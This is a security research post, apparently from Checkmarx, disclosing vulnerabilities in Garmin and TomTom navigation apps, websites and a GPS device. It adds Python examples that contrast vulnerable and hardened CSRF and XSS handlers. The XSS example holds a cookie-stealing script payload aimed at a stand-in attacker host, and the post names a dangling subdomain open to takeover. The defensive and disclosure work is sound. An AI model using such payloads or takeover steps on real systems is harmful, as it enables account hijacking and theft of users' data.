In the United States alone, 84% of adults are using navigation applications, according to a recent Gallup poll. Whether they’re downloading it in an app store or the navigation capability is already built into the car, these navigation tools are taking us to the grocery store, to our grandparents’ house, to job interviews, and everywhere in between and beyond. People around the world pull out devices and launch the navigation apps that lead millions to their destinations every day.
(In)Security in Navigation Apps

The Checkmarx Security Research Team decided to take a look into the navigation apps from two well-known GPS navigation makers: Garmin and TomTom. As the industry has moved from dedicated GPS navigation devices to smartphone apps for iOS and Android, so have Garmin and TomTom, reaching into our phones, cars, and all the way into watches and other wearables. It's incredibly useful, but how successful have these companies been at building security into their apps?
Garmin: Vulnerabilities and Remediation

In the Garmin Android app, our team found several vulnerabilities. Some of them can result in a Garmin account takeover, meaning an attacker may gain access to all of the data stored in the user's Garmin account, which can include private, personal information and location data. Other vulnerabilities we discovered allow an attacker to lock users out of their account, which amounts to a Denial of Service (DoS) attack. On Garmin's web applications (their websites) we found many more vulnerabilities, which suggest gaps in application-security awareness during development. Some of these allow an attacker to harvest user names from the website, which is very helpful for crafting convincing phishing attacks. Others may leak sensitive information, including names and locations, and others may even allow an attacker to cause a user to download malware. We contacted Garmin with a detailed report showing where we found issues in their web applications and Android apps. In our research, we ordered the findings by CVSS 3 score and provided possible attack scenarios for several of the security issues. Here are a few of the vulnerabilities we discovered:
- CSRF - Account takeover on SSO endpoint. Attack vector: When a user resets their password, a temporary password is sent via email. Once the user logs in with this temporary password, a new password can be set. However, the endpoint neither checks the Referer header nor requires a CSRF token, so a request originating from an external, attacker-controlled page is accepted and can set the new password.
- Username and group enumeration on Garmin Connect. Attack vector: A malicious user can retrieve all users and groups by bypassing the pagination and character limits of the Garmin Connect system. Because such requests return large quantities of data, they also pose a denial-of-service risk.
- App Crash and Denial of Service. Attack vector: In certain scenarios it is possible to crash the victim's Garmin Connect app, creating a denial-of-service condition.
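The CSRF finding on the password-set endpoint is easiest to see side by side with the fix. The following is an added example written for this page, not Checkmarx's proof of concept and not Garmin's code. It models the endpoint with an in-memory session store, a hypothetical SSO origin `https://sso.example.test`, and constructed requests; the vulnerable handler honours any POST that carries the victim's session, while the hardened handler requires both an Origin/Referer that names our own site and a per-session CSRF token compared in constant time.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, Optional

# Constructed stand-in for the server-side session store: session id -> data.
SESSIONS: Dict[str, dict] = {}
# Hypothetical origin of the SSO site; the real hostname is an assumption here.
ALLOWED_ORIGIN = "https://sso.example.test"


@dataclass
class Request:
    """Minimal model of an HTTP POST reaching the set-password endpoint."""
    session_id: str
    form: Dict[str, str]
    headers: Dict[str, str] = field(default_factory=dict)


def start_reset_session(temp_password: str) -> str:
    """Step 1: the user logs in with the emailed temporary password. The server
    opens a session that may set a new password and binds a CSRF token to it."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {
        "temp_password_ok": True,
        "csrf_token": secrets.token_urlsafe(32),
        "password": temp_password,
    }
    return sid


def csrf_token_for(session_id: str) -> str:
    """The token the server embeds as a hidden field in its own reset form."""
    return SESSIONS[session_id]["csrf_token"]


def set_password_vulnerable(req: Request) -> bool:
    """The pattern in the finding: any POST carrying the victim's session is
    honoured. Neither Origin/Referer nor a CSRF token is ever checked."""
    sess = SESSIONS.get(req.session_id)
    if not sess or not sess["temp_password_ok"]:
        return False
    sess["password"] = req.form["new_password"]
    return True


def set_password_hardened(req: Request) -> bool:
    """Same endpoint with two independent defences and single-use semantics:
    1. Origin (falling back to Referer) must name our own site; a missing header
       is treated as hostile rather than trusted.
    2. The form must carry the per-session CSRF token, compared in constant time.
    On success the temporary-password window is closed."""
    sess = SESSIONS.get(req.session_id)
    if not sess or not sess["temp_password_ok"]:
        return False
    origin = req.headers.get("Origin") or req.headers.get("Referer", "")
    if not (origin == ALLOWED_ORIGIN or origin.startswith(ALLOWED_ORIGIN + "/")):
        return False
    submitted = req.form.get("csrf_token", "")
    if not hmac.compare_digest(submitted, sess["csrf_token"]):
        return False
    sess["password"] = req.form["new_password"]
    sess["temp_password_ok"] = False
    return True


def current_password(session_id: str) -> Optional[str]:
    sess = SESSIONS.get(session_id)
    return sess["password"] if sess else None


def cross_site_request(session_id: str) -> Request:
    """Constructed forged POST from an attacker page: the browser attaches the
    victim's session automatically, but the attacker cannot read the CSRF token
    and the browser reports the attacker's origin."""
    return Request(session_id, {"new_password": "attacker-chosen"},
                   {"Origin": "https://attacker.example"})


def legit_request(session_id: str, new_password: str) -> Request:
    """Constructed POST submitted from the server's own reset form."""
    return Request(session_id,
                   {"new_password": new_password,
                    "csrf_token": csrf_token_for(session_id)},
                   {"Origin": ALLOWED_ORIGIN})
```

The Origin/Referer check alone is not enough in practice (some clients strip Referer, and the empty-string case must be rejected rather than waved through, as above), which is why the token check is kept as an independent control; `hmac.compare_digest` avoids leaking the token through timing differences.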
TomTom: Vulnerabilities and Remediation

Our research scope included TomTom web applications, Android applications (TomTom MyDrive and TomTom GPS Traffic), and the GO 520 GPS device. We were sorry to find a plethora of vulnerabilities in all of them. A few of the security issues we found included:
- An exposed database. Attack vector: The database holds a lot of sensitive information and serves the download links presented to users, so an attacker with access to it could change those links to point to malware.
- GO 520 GPS device updates fetched over unencrypted HTTP. Attack vector: A man-in-the-middle can rewrite the update URL to point to rogue software that damages or backdoors the device, or that is used to track unsuspecting users.
- Stored XSS and CSRF. Attack vector: Accounts can be hijacked by combining stored XSS with CSRF. A victim who visits a specially crafted page has their billing information changed automatically; the stored XSS payload placed in the shipping street field then sends the victim's cookie details to a remote web server. In this way attackers can steal user accounts, trigger a malware download, change user information, and more. Once the attacker has hijacked the account, they have access to the data entered into the device, including the places you typically go, the road trips you take, and your points of interest. This data could be exploited or used by anyone.
- Subdomain takeover. Attack vector: christmas.tomtom.com is a CNAME for an Amazon AWS (S3) bucket that is not currently registered, so an attacker can register a bucket with that name and use the trusted tomtom.com subdomain to trick victims. Dangling CNAME records are a convenient weapon for malicious users.
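For the stored XSS in the shipping street field, the two controls that break the attack chain described above are contextual output encoding when the stored value is rendered, and cookie attributes that keep the session out of `document.cookie`. The following is an added example written for this page, not TomTom's code and not Checkmarx's payload; the profile record, the form template, and the attacker host `attacker.example` are constructed for illustration.

```python
import html
import re
from typing import Dict

# Constructed profile record. The shipping street holds a payload of the kind the
# finding describes: it breaks out of the attribute and ships document.cookie
# to a hypothetical attacker host.
PROFILE: Dict[str, str] = {
    "name": "Sample User",
    "shipping_street": '"><script>fetch("https://attacker.example/?c="'
                       '+document.cookie)</script>',
}

# Constructed server-side template; the stored value lands inside a quoted
# attribute, so the relevant encoding context is "HTML attribute".
TEMPLATE = (
    '<form action="/account/billing" method="post">\n'
    '  <input name="shipping_street" value="{street}">\n'
    '</form>'
)

# Allow-list for a street line used as input validation (defence in depth only;
# output encoding is the control that actually stops the XSS).
_STREET_RE = re.compile(r"^[A-Za-z0-9 .,'#/\-]{1,100}$")


def validate_street(value: str) -> bool:
    """Reject control characters, quotes and angle brackets at input time."""
    return _STREET_RE.match(value) is not None


def render_billing_vulnerable(profile: Dict[str, str]) -> str:
    """Stored value dropped straight into the attribute: the leading '">' closes
    the attribute and the <script> executes in the victim's session."""
    return TEMPLATE.format(street=profile["shipping_street"])


def render_billing_hardened(profile: Dict[str, str]) -> str:
    """Contextual output encoding. quote=True is essential here: without it the
    double quote in the payload would still terminate the value attribute."""
    return TEMPLATE.format(street=html.escape(profile["shipping_street"], quote=True))


def contains_live_script(rendered: str) -> bool:
    """Crude check used below: an unencoded <script tag in the rendered HTML."""
    return "<script" in rendered


def session_cookie_header(value: str, secure: bool = True) -> str:
    """Set-Cookie line for the session. HttpOnly keeps the cookie out of
    document.cookie, so even a script that does run cannot exfiltrate it;
    Secure stops plain-HTTP leakage; SameSite=Lax blocks most cross-site POSTs
    of the kind the CSRF half of the finding relies on."""
    parts = [f"session={value}", "Path=/", "HttpOnly", "SameSite=Lax"]
    if secure:
        parts.append("Secure")
    return "Set-Cookie: " + "; ".join(parts)
```

Encoding must match the context the value is rendered into: `html.escape(..., quote=True)` is correct for text nodes and quoted attributes, but a value placed inside a `<script>` block or a URL needs a different encoder, and an allow-list like `validate_street` is a supplementary check rather than a substitute.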